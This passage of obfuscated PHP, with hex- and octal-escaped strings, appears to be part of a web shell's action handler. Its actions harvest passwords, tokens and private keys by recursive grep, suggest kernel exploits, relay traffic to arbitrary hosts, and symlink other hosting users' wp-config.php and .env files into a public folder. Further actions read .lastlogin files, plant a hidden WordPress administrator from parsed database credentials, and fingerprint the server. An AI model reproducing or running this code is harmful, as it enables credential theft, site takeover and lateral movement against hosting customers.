"\x63\162\145\144\x5f\x68\141\162\166\145\x73\164\145\x72": goto q8jPm; XyFxQ: if ($j3_hR) { goto tZD7B; } goto Nij9o; mkgaF: $v1Pog = ["\x73\164\141\x74\x75\163" => "\x73\x75\143\x63\145\163\163", "\x64\x61\164\x61" => htmlspecialchars($BKvy0 ?: "\116\157\40\143\162\x65\144\145\x6e\164\151\141\x6c\x73\x20\x66\x6f\x75\x6e\x64\x20\157\162\x20\x67\162\x65\160\x20\151\163\x20\156\157\x74\40\x61\x76\x61\151\x6c\141\x62\154\x65\56")]; goto DMVtS; pvhVL: $azofS = "\147\162\145\160\x20\x2d\x72\40\55\151\40\55\x45\40\55\55\145\170\x63\x6c\165\x64\145\55\x64\151\162\x3d\x7b\56\147\x69\x74\54\56\163\166\156\54\x6e\157\144\145\x5f\x6d\x6f\x64\165\154\145\x73\x7d\x20\55\x2d\145\x78\x63\154\x75\x64\x65\x3d\134\52\56\x7b\152\160\147\54\152\x70\x65\x67\x2c\x70\x6e\x67\54\x67\x69\x66\x2c\x62\155\x70\54\172\151\160\x2c\164\x61\x72\54\147\x7a\x2c\155\x70\x34\x2c\x6d\x70\x33\x2c\141\166\151\54\x70\x64\146\x7d\40" . escapeshellarg($G6Mdr) . "\x20" . escapeshellarg($j3_hR) . "\40\62\x3e\x2f\144\x65\166\x2f\x6e\x75\154\154"; goto y6eCz; DMVtS: goto vbH70; goto sffHX; Ak0Wm: tZD7B: goto Fd_m_; Fd_m_: $G6Mdr = "\50\160\141\163\x73\x77\x6f\x72\x64\x7c\160\x61\x73\163\x77\x64\174\160\x61\163\x73\174\160\x77\144\174\x73\x65\x63\x72\x65\164\x7c\164\157\153\x65\156\174\141\160\151\x5f\x6b\x65\171\x7c\x61\165\x74\x68\x5f\x6b\145\x79\x7c\160\x72\x69\x76\x61\164\x65\x5f\153\145\x79\174\153\145\171\174\143\x72\x65\x64\x65\156\x74\x69\141\154\x7c\x63\157\x6e\156\x65\143\164\x69\x6f\x6e\x5f\x73\164\162\151\156\147\x7c\142\x65\x67\x69\156\40\x28\162\163\141\174\x64\163\x61\174\145\143\51\40\160\162\151\166\x61\x74\145\40\x6b\145\171\x29\x5b\134\163\72\75\135\x2b\x5b\x27\x22\135\x3f\x28\133\x5e\x5c\163\47\42\135\x2b\51\133\47\x22\135\77"; goto pvhVL; q8jPm: $j3_hR = realpath($_POST["\160\141\164\x68"]); goto XyFxQ; YMSkW: goto vbH70; goto Ak0Wm; y6eCz: $BKvy0 = zmrP5($azofS); goto mkgaF; Nij9o: $v1Pog["\x6d\x65\x73\x73\x61\x67\x65"] = "\x49\x6e\166\141\x6c\x69\144\40\x70\x61\x74\150\x20\160\162\157\x76\x69\144\145\x64\x2e"; goto YMSkW; sffHX: case "\x65\170\x70\x6c\157\151\x74\x5f\163\165\x67\x67\145\x73\164\x65\x72": goto bmcRu; YlEnM: $Pkczl = []; goto DHCVU; DHCVU: foreach ($HWo1L as $ubQAO) { $Pkczl[$ubQAO] = "\x68\164\164\x70\163\x3a\57\57\167\x77\167\x2e\145\x78\x70\x6c\157\151\164\55\144\142\x2e\143\157\155\57\x73\x65\141\162\x63\x68\x3f\161\x3d" . urlencode($ubQAO); PG3FS: } goto TbAuL; bmcRu: $pmeye = $_POST["\144\x69\x73\164\x72\157"]; goto qq4zY; vlzcO: $v1Pog = ["\x73\x74\x61\164\x75\x73" => "\x73\x75\143\143\145\x73\x73", "\x6c\151\156\153\163" => $Pkczl]; goto wqog3; qq4zY: $gmLqH = $_POST["\153\x65\x72\156\x65\154"]; goto r5sJH; r5sJH: $HWo1L = array_unique(array_filter([$pmeye, $gmLqH, php_uname("\163")])); goto YlEnM; wqog3: goto vbH70; goto ANrI8; TbAuL: c7Dww: goto vlzcO; ANrI8: case "\x70\157\x72\164\x5f\146\157\162\x77\x61\x72\x64": goto mvJU7; fq1wY: $v1Pog["\155\145\x73\x73\141\147\145"] = "\x46\141\151\154\x65\x64\x20\x74\157\40\x61\x63\x63\145\x70\164\x20\143\154\x69\145\x6e\x74\40\143\157\x6e\x6e\x65\143\x74\x69\x6f\x6e\x3a\x20" . socket_strerror(socket_last_error($SZHaV)); goto HbEiU; y2Zk4: @socket_close($TUvmd); goto id01A; CfKAC: @socket_close($SZHaV); goto F3jX_; DRwSE: goto u3crd; goto CvPw0; cmtel: $TUvmd = @socket_accept($SZHaV); goto WBiQp; NX4AX: if (!in_array($n0Lt7, $Fxsn7)) { goto r2UGG; } goto LKvWi; BYSgj: if (!(socket_select($Fxsn7, $QhaZj, $cbUTK, 0) < 1)) { goto aZmjX; } goto aJVev; tg4c_: $W5e6I = (int) $_POST["\x74\141\162\x67\145\x74\x5f\160\157\x72\x74"]; goto Xeoy8; SkGaY: zga4Y: goto Oc4uK; F3jX_: goto vbH70; goto B6_Oa; U8Onn: $v1Pog["\155\x65\163\x73\141\147\145"] = "\x73\x6f\x63\153\145\164\x5f\143\x72\x65\x61\164\x65\x28\51\40\x69\x73\x20\144\151\163\141\x62\x6c\x65\x64\56"; goto CptBG; OZ4NQ: goto Qox1A; goto hqtDM; mA1iq: if (!true) { goto u3crd; } goto UoQd8; Oc4uK: $n0Lt7 = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); goto aAjdb; GtWfA: goto vbH70; goto Gi5Ak; A_u5a: $v1Pog["\x6d\x65\x73\163\141\x67\145"] = "\103\x6f\165\x6c\x64\40\156\x6f\164\x20\x63\157\156\x6e\x65\x63\x74\x20\164\157\40\x74\141\162\147\x65\164\40{$Mn4tp}\72{$W5e6I}\x3a\x20" . socket_strerror(socket_last_error()); goto VuQqK; Uz_1_: goto vbH70; goto MKvQH; QVLd9: $SZHaV = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP); goto LZyUV; EDL5t: r2UGG: goto OZ4NQ; nF92h: socket_set_nonblock($TUvmd); goto vO4MG; HbEiU: @socket_close($SZHaV); goto SiWEg; LKvWi: $siOBH = @socket_read($n0Lt7, 4096); goto G3Wjt; muyzU: @socket_write($n0Lt7, $siOBH, strlen($siOBH)); goto fdTgM; AKTcf: goto vbH70; goto LA3XK; MDSfk: Z8E15: goto Tod_P; B6_Oa: KLFp3: goto nF92h; xMRC0: goto u3crd; goto HMUdp; CptBG: goto vbH70; goto MDSfk; W3mdp: Qox1A: goto mA1iq; UoQd8: $Fxsn7 = [$TUvmd, $n0Lt7]; goto mkE2K; mvJU7: $VXQxC = (int) $_POST["\154\x69\163\x74\x65\x6e\x5f\160\x6f\x72\164"]; goto yRVTr; Xeoy8: if (LiX3F("\163\x6f\143\153\x65\164\x5f\143\162\x65\x61\x74\x65")) { goto Z8E15; } goto U8Onn; G3Wjt: if (!($siOBH === false || $siOBH === '')) { goto PB45j; } goto DRwSE; mkE2K: $QhaZj = null; goto i0W3v; id01A: @socket_close($n0Lt7); goto TwfzO; TwfzO: @socket_close($SZHaV); goto orgZq; D5bna: $siOBH = @socket_read($TUvmd, 4096); goto vRoo4; LA3XK: bZUvW: goto QVLd9; deouw: $v1Pog["\x6d\x65\163\x73\141\147\145"] = "\103\157\165\x6c\x64\x20\x6e\157\164\40\142\x69\156\x64\x20\164\157\x20\154\x69\163\164\x65\156\40\x70\157\162\x74\40{$VXQxC}\72\x20" . socket_strerror(socket_last_error()); goto ZGAMm; WBiQp: if ($TUvmd) { goto zga4Y; } goto fq1wY; MKvQH: vDWIr: goto cmtel; LZyUV: if (!(!$SZHaV || !@socket_bind($SZHaV, "\x30\x2e\60\56\x30\56\x30", $VXQxC) || !@socket_listen($SZHaV))) { goto vDWIr; } goto deouw; fLov8: @socket_write($TUvmd, $siOBH, strlen($siOBH)); goto EDL5t; GQz6X: aZmjX: goto I0lMT; vO4MG: socket_set_nonblock($n0Lt7); goto W3mdp; HMUdp: eGyVy: goto muyzU; hqtDM: u3crd: goto y2Zk4; Tod_P: if (!($VXQxC <= 0 || $W5e6I <= 0 || empty($Mn4tp))) { goto bZUvW; } goto E0YmU; vRoo4: if (!($siOBH === false || $siOBH === '')) { goto eGyVy; } goto xMRC0; VuQqK: @socket_close($TUvmd); goto CfKAC; yRVTr: $Mn4tp = $_POST["\x74\x61\162\x67\145\x74\137\150\x6f\x73\x74"]; goto tg4c_; aJVev: goto Qox1A; goto GQz6X; E0YmU: $v1Pog["\155\x65\x73\x73\141\147\x65"] = "\111\x6e\x76\x61\154\151\x64\40\160\141\x72\141\155\x65\164\x65\162\163\40\x66\157\162\40\x70\x6f\162\164\x20\146\x6f\162\x77\141\162\144\x69\x6e\x67\x2e"; goto AKTcf; ZGAMm: @socket_close($SZHaV); goto Uz_1_; CvPw0: PB45j: goto fLov8; fdTgM: OB2yg: goto NX4AX; i0W3v: $cbUTK = null; goto BYSgj; orgZq: $v1Pog = ["\x73\164\141\x74\x75\x73" => "\163\x75\143\x63\x65\163\x73", "\155\145\163\x73\141\147\x65" => "\x50\x6f\x72\x74\40\x66\157\x72\167\141\162\x64\x65\162\x20\157\x6e\x20{$VXQxC}\x20\x66\x69\x6e\151\163\150\x65\x64\x20\151\164\163\40\143\157\x6e\156\145\x63\x74\x69\x6f\x6e\x2e"]; goto GtWfA; I0lMT: if (!in_array($TUvmd, $Fxsn7)) { goto OB2yg; } goto D5bna; aAjdb: if (!(!$n0Lt7 || !@socket_connect($n0Lt7, $Mn4tp, $W5e6I))) { goto KLFp3; } goto A_u5a; SiWEg: goto vbH70; goto SkGaY; Gi5Ak: case "\x73\171\x6d\154\151\x6e\x6b\137\143\x70\141\x6e\x65\154": goto Gg0fL; W13Tq: $AgHX4 = ["\x2f\150\157\155\145\57{$qhLRz}\57\160\165\x62\154\151\143\137\x68\164\155\154\x2f\x77\160\x2d\143\x6f\x6e\x66\x69\x67\56\x70\x68\160", "\57\150\157\155\145\57{$qhLRz}\57\160\165\142\x6c\x69\143\x5f\150\164\155\x6c\x2f\x63\157\x6e\x66\x69\147\165\162\x61\x74\x69\x6f\156\x2e\160\x68\160", "\x2f\x68\x6f\x6d\x65\x2f{$qhLRz}\x2f\160\x75\142\154\151\143\137\150\164\155\154\57\143\157\156\x66\151\x67\x2f\x73\x65\x74\164\x69\x6e\147\x73\x2e\151\x6e\143\56\x70\x68\160", "\x2f\150\157\x6d\x65\57{$qhLRz}\57\x70\x75\x62\154\x69\143\137\x68\x74\155\x6c\x2f\x73\151\164\x65\163\x2f\144\145\x66\x61\165\154\x74\x2f\x73\145\164\x74\x69\x6e\147\163\x2e\x70\x68\x70", "\x2f\x68\x6f\x6d\145\57{$qhLRz}\x2f\x70\x75\x62\x6c\x69\x63\x5f\150\x74\155\154\57\x2e\145\x6e\x76", "\x2f\x68\x6f\155\145\57{$qhLRz}\57\160\165\x62\154\x69\143\x5f\150\x74\x6d\x6c\57\141\x70\x70\x2f\145\x74\x63\x2f\154\x6f\x63\141\x6c\x2e\170\155\x6c"]; goto E_P2R; XqUYo: $YGPcu = dirname(__FILE__) . DIRECTORY_SEPARATOR . "\x73\x79\155\137\154\x69\x6e\x6b\163"; goto A_vb5; ansoz: qjNq2: goto JvMHl; vC37X: $v1Pog["\155\145\163\x73\141\x67\145"] = "\x55\x73\x65\x72\156\141\x6d\145\x20\x69\163\40\162\145\161\165\x69\162\145\144\56"; goto hERrI; qLN4A: if (!function_exists("\163\171\155\154\x69\156\153")) { $v1Pog["\x6d\145\x73\x73\x61\147\x65"] = "\163\171\155\154\x69\x6e\x6b\x28\x29\x20\146\165\156\x63\x74\x69\x6f\156\x20\x69\163\x20\144\151\163\x61\142\x6c\145\144\x2e"; goto vbH70; } goto XqUYo; NtyD5: @mkdir($YGPcu, 0755); goto Zz0TK; obgEQ: goto vbH70; goto ipVq5; rLJw8: $v1Pog["\x6d\145\x73\163\x61\147\145"] = "\103\141\x6e\x6e\x6f\x74\x20\x63\162\x65\x61\x74\x65\x20\x6f\x72\40\x77\x72\x69\164\145\x20\164\x6f\40\163\171\x6d\x6c\151\x6e\x6b\x20\x64\x69\162\145\x63\x74\x6f\x72\x79\x3a\x20" . htmlspecialchars($YGPcu); goto FWxzJ; WaZVr: if (!empty($qhLRz)) { goto KVjSM; } goto vC37X; FWxzJ: goto vbH70; goto k3LB7; hERrI: goto vbH70; goto vGEew; OKbd5: if (is_writable($YGPcu)) { goto eAO10; } goto rLJw8; JvMHl: $v1Pog = ["\x73\164\x61\x74\165\x73" => "\163\x75\143\x63\x65\x73\163", "\x72\145\163\x75\x6c\164\x73" => $gSi8X, "\x6d\x65\163\163\x61\147\x65" => "\123\x79\x6d\x6c\151\156\153\x20\160\x72\157\x63\145\163\163\x20\x63\x6f\155\x70\x6c\x65\x74\145\144\x2e\40\x43\150\x65\x63\x6b\x20\162\145\x73\x75\154\x74\x73\x20\142\x65\154\157\x77\56"]; goto obgEQ; E_P2R: foreach ($AgHX4 as $O0AQt) { goto yJcS4; lsdH0: hYrYp: goto fbR3I; Lt1Ai: @unlink($eN0SN); goto uyZLV; YUCLF: csuMT: goto lsdH0; uyZLV: if (!symlink($O0AQt, $eN0SN)) { goto csuMT; } goto Ao90V; Lvoe0: $gSi8X[] = ["\x74\141\162\x67\145\164" => $O0AQt, "\x6c\x69\156\x6b\137\x75\x72\154" => $gAGc0]; goto YUCLF; yJcS4: $Ncya3 = "\x75\163\x65\162\x5f" . $qhLRz . "\137" . md5($O0AQt) . "\x2e\x74\170\164"; goto d34wh; d34wh: $eN0SN = $YGPcu . "\x2f" . $Ncya3; goto Lt1Ai; Ao90V: $gAGc0 = (isset($_SERVER["\x48\124\124\x50\x53"]) && $_SERVER["\x48\124\x54\x50\123"] === "\157\156" ? "\x68\164\x74\160\163" : "\x68\164\164\160") . "\72\x2f\x2f{$_SERVER["\110\x54\x54\120\137\110\117\123\124"]}" . dirname($_SERVER["\x50\x48\x50\x5f\x53\x45\114\106"]) . "\x2f\163\x79\x6d\x5f\x6c\x69\156\153\163\57" . $Ncya3; goto Lvoe0; fbR3I: } goto ansoz; k3LB7: eAO10: goto omu2n; Zz0TK: Dkh4s: goto OKbd5; A_vb5: if (is_dir($YGPcu)) { goto Dkh4s; } goto NtyD5; vGEew: KVjSM: goto qLN4A; omu2n: $gSi8X = []; goto W13Tq; Gg0fL: $qhLRz = $_POST["\x75\x73\145\162"]; goto WaZVr; ipVq5: case "\x66\x69\156\144\x5f\x63\160\141\156\x65\x6c\137\143\162\x65\144\x73": goto M0Y6e; XretZ: goto vbH70; goto vxSWN; kpS5T: $BKvy0 .= htmlspecialchars(file_get_contents($qiUai)); goto KedxI; YD9Bc: $qiUai = "{$DXIyj}\57\56\x6c\141\x73\164\154\157\x67\151\156"; goto Tj9qz; FH0dB: if (!empty($DXIyj)) { goto AiXuC; } goto pPsWy; pPsWy: $v1Pog["\x6d\145\x73\163\141\x67\x65"] = "\x43\157\x75\x6c\144\x20\x6e\x6f\164\x20\x64\x65\164\x65\x72\155\x69\x6e\145\40\x68\x6f\x6d\145\x20\x64\x69\x72\x65\143\x74\x6f\162\171\56"; goto XretZ; fS6me: if (is_readable($qiUai)) { goto gOKOL; } goto Fw298; bnB6o: $BKvy0 .= "\x2d\x2d\x2d\x20\106\157\165\156\x64\x20{$qiUai}\40\x2d\55\55\xa"; goto kpS5T; QSs2r: gOKOL: goto bnB6o; AdEZM: $BKvy0 .= "\x48\x6f\x6d\145\40\x64\151\162\x65\x63\164\157\162\x79\72\40{$DXIyj}\xa\12"; goto fS6me; vxSWN: AiXuC: goto YD9Bc; yquNx: goto L_JF2; goto QSs2r; Tj9qz: $BKvy0 = "\x53\145\141\x72\143\x68\x69\x6e\x67\x20\x66\x6f\x72\40\143\120\x61\x6e\x65\154\x20\143\x72\145\144\145\x6e\164\151\x61\154\x73\40\146\x6f\x72\40\165\163\x65\x72\72\40{$qhLRz}\12"; goto AdEZM; DwXhE: L_JF2: goto BTZfC; BTZfC: $v1Pog = ["\163\x74\x61\164\x75\163" => "\163\x75\143\143\145\x73\163", "\x64\141\164\141" => $BKvy0]; goto ot1sl; M0Y6e: $qhLRz = get_current_user(); goto sKIg6; Fw298: $BKvy0 .= "{$qiUai}\x20\x6e\x6f\164\40\x66\157\165\x6e\144\40\x6f\x72\x20\x6e\157\164\x20\162\x65\x61\x64\x61\x62\x6c\145\56\12"; goto yquNx; KedxI: $BKvy0 .= "\12\x2d\x2d\x2d\55\x2d\55\55\55\55\x2d\55\55\55\55\55\55\55\55\55\55\55\55\55\55\55\55\12"; goto DwXhE; sKIg6: $DXIyj = $_SERVER["\110\x4f\115\x45"] ?? (function_exists("\160\157\163\x69\170\137\x67\145\164\x70\167\x75\151\144") ? posix_getpwuid(getmyuid())["\144\x69\162"] : ''); goto FH0dB; ot1sl: goto vbH70; goto yl9kk; yl9kk: case "\143\162\x65\141\164\x65\137\167\160\x5f\x75\163\x65\x72": goto ZXFiH; SWjzF: goto vbH70; goto U3geQ; ZXFiH: $p9nOH = realpath($_POST["\x63\x6f\x6e\146\x69\x67\137\x70\141\164\150"]); goto YN1qG; KRv4B: $wBZef = file_get_contents($p9nOH); goto nSYtl; Ov6_u: $CHFh3 = W0_Uy("\x44\x42\137\x50\101\x53\x53\127\117\x52\104", $wBZef); goto yv0PA; uaPfm: goto vbH70; goto F026g; G7Sgg: $hHZQa = qe79o($JHnly, "\x49\x4e\x53\x45\122\124\40\111\116\124\117\x20\x60{$Xi9YD}\165\x73\145\162\x73\140\x20\50\x75\163\x65\x72\x5f\x6c\x6f\147\x69\156\54\40\165\163\145\x72\x5f\160\141\x73\163\x2c\x20\165\x73\145\x72\x5f\156\x69\x63\x65\x6e\x61\x6d\x65\54\x20\x75\x73\x65\162\137\x65\155\141\151\x6c\54\x20\165\163\x65\162\x5f\162\145\x67\x69\163\164\145\x72\145\144\54\x20\165\163\x65\x72\137\163\x74\141\164\165\x73\x2c\x20\x64\x69\163\x70\x6c\141\171\137\x6e\141\155\145\x29\x20\x56\101\x4c\x55\x45\x53\x20\50\77\x2c\40\77\x2c\40\77\54\x20\77\54\x20\116\x4f\x57\x28\x29\54\x20\60\54\x20\x3f\x29"); goto MUcdA; J5kvo: Uaq6G: goto jZAHd; GV42I: kHAe3($zpwgr, "\151\163", $RGlK1, $eoRvs); goto SSfTt; UpEhJ: u3IRG($WSO6I); goto JogR_; JogR_: $v1Pog = ["\163\x74\141\x74\165\163" => "\x73\165\x63\143\145\163\x73", "\x6d\145\x73\163\x61\147\x65" => "\127\x6f\x72\144\x50\162\145\163\163\x20\141\144\155\151\156\40\165\163\145\162\40\x27{$eEnBU}\x27\x20\143\162\x65\x61\164\x65\144\x20\x73\x75\143\x63\145\163\163\x66\165\154\154\x79\41"]; goto Zyduv; oYmPj: $v1Pog["\x6d\x65\163\163\x61\147\145"] = "\125\163\145\162\40\x27{$eEnBU}\47\40\x6f\x72\x20\145\155\141\151\154\40\47{$YflJ4}\47\x20\141\x6c\162\x65\141\144\x79\x20\145\x78\151\x73\x74\x73\x2e"; goto BrkYQ; HbUca: w9o1l($hHZQa); goto NBp4b; TeGLY: $v1Pog["\155\x65\163\163\x61\147\x65"] = "\x41\x6c\x6c\40\146\151\x65\154\144\x73\40\x61\162\x65\x20\x72\x65\x71\165\151\162\145\x64\56"; goto rGkgQ; nSYtl: function w0_uy($dTrV6, $Lrz4Z) { goto MjZVk; AIBlE: return null; goto hYA7m; MjZVk: if (!preg_match("\57\x64\x65\x66\x69\x6e\x65\134\50\134\163\52\x5b\x27\42\135" . $dTrV6 . "\x5b\x27\42\x5d\134\x73\52\54\134\x73\52\x5b\47\42\135\50\x2e\x2a\x3f\x29\133\x27\x22\x5d\134\x73\52\x5c\51\x2f", $Lrz4Z, $I5WkF)) { goto INHx3; } goto gFUO4; QxJyn: INHx3: goto AIBlE; gFUO4: return $I5WkF[1]; goto QxJyn; hYA7m: } goto xQncM; Go7l0: goto Yb3wy; goto xLU7k; mUHb8: if ($JHnly) { goto Nnp3W; } goto EJrqv; VDK24: if (!(empty($p9nOH) || empty($eEnBU) || empty($Vag37) || empty($YflJ4))) { goto Uaq6G; } goto TeGLY; YN1qG: $eEnBU = trim($_POST["\x6e\x65\167\x5f\165\x73\145\x72"]); goto cJC51; SSfTt: U3IRG($zpwgr); goto Lt6KD; BIwQK: $v1Pog["\x6d\x65\x73\163\x61\x67\145"] = "\106\x61\x69\x6c\x65\x64\x20\x74\157\x20\160\x61\x72\163\x65\x20\144\x61\x74\x61\x62\141\x73\145\x20\143\162\145\144\145\x6e\164\151\x61\x6c\x73\x20\146\162\x6f\x6d\40\167\160\55\x63\157\x6e\x66\151\147\56\160\150\x70\x2e"; goto SWjzF; UdUm2: $hHZQa = Qe79o($JHnly, "\123\105\114\x45\x43\124\x20\111\x44\x20\x46\x52\x4f\x4d\x20\140{$Xi9YD}\x75\163\145\162\x73\x60\40\127\x48\105\122\x45\x20\165\x73\145\x72\137\x6c\157\x67\x69\x6e\40\x3d\40\x3f\x20\x4f\122\x20\x75\x73\x65\x72\x5f\x65\155\x61\x69\x6c\x20\75\x20\77"); goto QyWW3; wsVnm: if (u3iRg($hHZQa)) { goto QIkEL; } goto f5HJT; yv0PA: $l7bdt = w0_UY("\x44\x42\x5f\x48\117\123\124", $wBZef); goto u7SYU; Bm5lG: if (!(!$vkU4A || !$Ki5dg || !$CHFh3 || !$l7bdt)) { goto htrfJ; } goto BIwQK; QyWW3: KhaE3($hHZQa, "\163\163", $eEnBU, $YflJ4); goto P2wls; P2wls: u3iRg($hHZQa); goto mrsMW; EJrqv: $v1Pog["\155\x65\163\163\x61\147\145"] = "\104\141\x74\141\x62\141\163\145\40\x43\x6f\x6e\156\x65\143\x74\151\x6f\156\40\106\x61\151\154\x65\144\x3a\x20" . gx6Lt(); goto QNd5C; K9BCI: khae3($WSO6I, "\151", $RGlK1); goto UpEhJ; rGkgQ: goto vbH70; goto J5kvo; V5Ron: if (!function_exists("\x47\70\101\x55\101")) { $v1Pog["\155\x65\x73\163\141\x67\145"] = "\x4d\x79\123\x51\x4c\151\40\145\x78\164\145\x6e\163\151\157\x6e\40\151\163\40\x6e\x6f\164\x20\145\x6e\141\x62\x6c\145\x64\56"; goto vbH70; } goto KRv4B; xQncM: $vkU4A = W0_uY("\x44\102\137\116\x41\x4d\105", $wBZef); goto Y0vKk; xLU7k: QIkEL: goto duOZZ; wa7Wq: goto vbH70; goto L7k5L; F026g: dKAHR: goto HbUca; Lt6KD: $WSO6I = qe79o($JHnly, "\111\x4e\x53\105\x52\124\40\x49\x4e\x54\117\x20\140{$Xi9YD}\x75\x73\x65\x72\155\145\x74\x61\140\x20\50\165\x73\145\x72\x5f\151\x64\54\40\155\x65\164\141\137\153\x65\171\x2c\x20\x6d\x65\164\141\137\166\141\154\165\145\51\x20\x56\x41\x4c\x55\x45\123\x20\x28\77\54\40\47{$Xi9YD}\x75\x73\x65\162\x5f\154\145\166\x65\154\47\x2c\x20\47\x31\x30\47\x29"); goto K9BCI; BrkYQ: U8F22($JHnly); goto uaPfm; PiNYl: $v1Pog["\155\145\x73\163\x61\147\145"] = "\167\x70\x2d\x63\157\x6e\146\x69\147\56\160\x68\x70\x20\x6e\x6f\x74\40\x66\157\165\156\144\x20\x6f\162\40\x6e\157\x74\x20\x72\x65\x61\144\x61\142\154\145\x20\141\164\40\164\150\145\x20\163\160\x65\x63\151\146\151\x65\144\40\160\x61\164\150\x2e"; goto wa7Wq; mrsMW: YLBBa($hHZQa); goto J_3MM; NBp4b: $NPElf = md5($Vag37); goto G7Sgg; L7k5L: JHVtc: goto V5Ron; PT7Z4: tUlKS: goto Bm5lG; hQhxw: Nnp3W: goto UdUm2; cJC51: $Vag37 = trim($_POST["\x6e\145\x77\137\160\x61\163\x73"]); goto Q6yKn; jZAHd: if (!(!is_file($p9nOH) || !is_readable($p9nOH))) { goto JHVtc; } goto PiNYl; U3geQ: htrfJ: goto RbMvQ; JMw5n: $Xi9YD = $I5WkF[1]; goto PT7Z4; QNd5C: goto vbH70; goto hQhxw; cc_CL: goto vbH70; goto Hoglv; RbMvQ: $JHnly = @g8AUa($l7bdt, $Ki5dg, $CHFh3, $vkU4A); goto mUHb8; xHd2Z: $zpwgr = Qe79O($JHnly, "\111\116\123\x45\x52\x54\x20\x49\116\124\x4f\40\140{$Xi9YD}\x75\163\x65\162\155\145\x74\141\x60\x20\x28\x75\163\x65\162\x5f\151\x64\x2c\40\155\x65\164\x61\x5f\x6b\145\x79\x2c\x20\x6d\x65\x74\141\x5f\166\141\154\165\x65\51\40\126\101\114\x55\x45\123\40\x28\77\x2c\x20\x27{$Xi9YD}\143\141\160\141\142\151\154\151\164\151\145\163\x27\54\x20\x3f\x29"); goto GV42I; R2R3v: if (!preg_match("\x2f\134\44\164\x61\142\154\x65\137\160\162\x65\146\x69\x78\134\163\x2a\75\x5c\163\x2a\133\47\x22\x5d\50\x5b\141\55\172\x41\55\132\x30\55\71\x5f\x5d\52\51\x5b\x27\42\135\57", $wBZef, $I5WkF)) { goto tUlKS; } goto JMw5n; dG3pW: U8F22($JHnly); goto cc_CL; duOZZ: $RGlK1 = UuuHO($JHnly); goto uM_q1; J_3MM: if (!(be9TO($hHZQa) > 0)) { goto dKAHR; } goto oYmPj; uM_q1: $eoRvs = "\141\72\x31\72\173\163\72\61\x33\x3a\x22\x61\x64\155\151\x6e\x69\x73\164\x72\x61\164\157\x72\x22\x3b\142\72\61\73\x7d"; goto xHd2Z; Zyduv: Yb3wy: goto dG3pW; Y0vKk: $Ki5dg = w0_Uy("\x44\x42\137\125\x53\105\x52", $wBZef); goto Ov6_u; Q6yKn: $YflJ4 = trim($_POST["\156\x65\167\x5f\145\155\x61\151\154"]); goto VDK24; f5HJT: $v1Pog["\x6d\x65\163\163\141\x67\x65"] = "\106\x61\151\154\145\x64\x20\x74\157\x20\x69\x6e\x73\145\x72\164\x20\165\163\145\x72\40\151\x6e\x74\157\x20\x64\x61\164\x61\x62\141\163\x65\x3a\x20" . jVZ13($JHnly); goto Go7l0; u7SYU: $Xi9YD = "\167\x70\137"; goto R2R3v; MUcdA: KHaE3($hHZQa, "\x73\x73\163\163\x73", $eEnBU, $NPElf, $eEnBU, $YflJ4, $eEnBU); goto wsVnm; Hoglv: case "\x67\x65\x74\x5f\163\145\162\x76\145\x72\x5f\x66\151\156\147\x65\x72\160\162\x69\x6e\x74": goto vTLDr; GWvEg: $siOBH["\101\x70\x61\143\x68\145\40\x4d\x6f\144\165\154\x65\163"] = implode("\x2c\x20", FGFrz()); goto RBnp4; K5erT: $siOBH["\111\x6e\163\164\141\154\154\145\x64\40\120\x61\143\x6b\141\147\145\163\40\50\x59\x55\115\x29"] = ZmRP5("\171\165\x6d\40\154\x69\x73\164\40\151\x6e\163\164\141\x6c\x6c\145\144\x20\174\x20\150\x65\x61\x64\40\55\156\x20\x35\x30"); goto L11hm; FxWzp: $siOBH["\x52\x75\156\156\x69\x6e\x67\x20\123\145\x72\166\151\143\145\163\40\x28\114\151\x6e\165\170\51"] = zMRp5("\x73\171\x73\164\x65\155\x63\164\x6c\x20\x6c\151\x73\164\55\x75\156\151\x74\163\40\55\55\x74\171\160\145\x3d\163\145\x72\x76\151\143\x65\x20\x2d\x2d\x73\164\x61\164\x65\75\162\165\x6e\x6e\x69\156\147\40\62\76\x2f\x64\145\166\57\x6e\x75\x6c\154") ?: "\x43\x6f\165\154\x64\x20\156\x6f\x74\x20\147\x65\x74\x20\x73\x65\x72\x76\x69\x63\145\x73\x2e"; goto dndI7; W4rG3: $siOBH["\x49\156\x73\x74\x61\x6c\154\145\x64\40\120\x61\x63\x6b\141\147\145\163"] = "\120\x61\143\x6b\141\x67\x65\40\155\141\156\x61\x67\145\x72\40\50\x61\160\164\x2f\171\x75\x6d\x29\x20\x6e\x6f\164\x20\146\157\x75\156\x64\56"; goto p42zg; iejqW: goto iaden; goto BrWLE; vTLDr: $siOBH = []; goto iajWx; QkaFc: if (function_exists("\106\147\146\x52\172")) { goto sVuIV; } goto W4Jxx; W4Jxx: $siOBH["\101\x70\x61\143\150\145\40\115\x6f\144\x75\154\145\x73"] = "\x61\160\x61\x63\x68\145\137\147\x65\x74\137\155\x6f\x64\x75\x6c\145\x73\50\51\x20\x6e\x6f\164\x20\141\166\141\x69\x6c\141\x62\154\x65\56"; goto iejqW; DL1Uw: goto vbH70; goto PdEFw; RBnp4: iaden: goto FxWzp; L11hm: EMG8b: goto rklKi; Zig2H: goto EMG8b; goto O5MX5; fvL1s: $siOBH["\111\156\163\x74\x61\154\154\145\x64\x20\x50\141\143\x6b\141\147\145\163\x20\x28\x41\x50\124\x29"] = zmrp5("\144\x70\153\147\40\x2d\55\x67\x65\x74\x2d\x73\x65\x6c\x65\143\x74\x69\x6f\x6e\163\x20\174\x20\150\x65\141\x64\40\55\x6e\x20\65\x30"); goto Zig2H; rklKi: $v1Pog = ["\x73\x74\141\164\x75\x73" => "\163\x75\143\x63\145\163\163", "\x64\x61\x74\141" => $siOBH]; goto DL1Uw; SasuE: dbBS_: goto fvL1s; BrWLE: sVuIV: goto GWvEg; ah0f1: if (is_executable("\x2f\165\163\x72\x2f\142\151\156\57\171\165\x6d")) { goto TnlIh; } goto W4rG3; WG8ii: $siOBH["\x50\x48\x50\40\x45\170\164\145\x6e\163\x69\x6f\156\x73"] = implode("\x2c\x20", get_loaded_extensions()); goto QkaFc; dndI7: if (is_executable("\x2f\x75\163\x72\57\x62\151\156\x2f\144\x70\153\x67")) { goto dbBS_; } goto ah0f1; p42zg: goto EMG8b; goto SasuE; O5MX5: TnlIh: goto K5erT; iajWx: $siOBH["\117\123"] = php_uname(); goto WG8ii; PdEFw: case "\x66\x69\156\x64\x5f\163\x65\156\163\151\x74\x69\166\145\137\x66\151\x6c\x65\x73": goto wIEVD; l8TrY: $kyLhg = ["\x2a\56\163\x71\x6c", 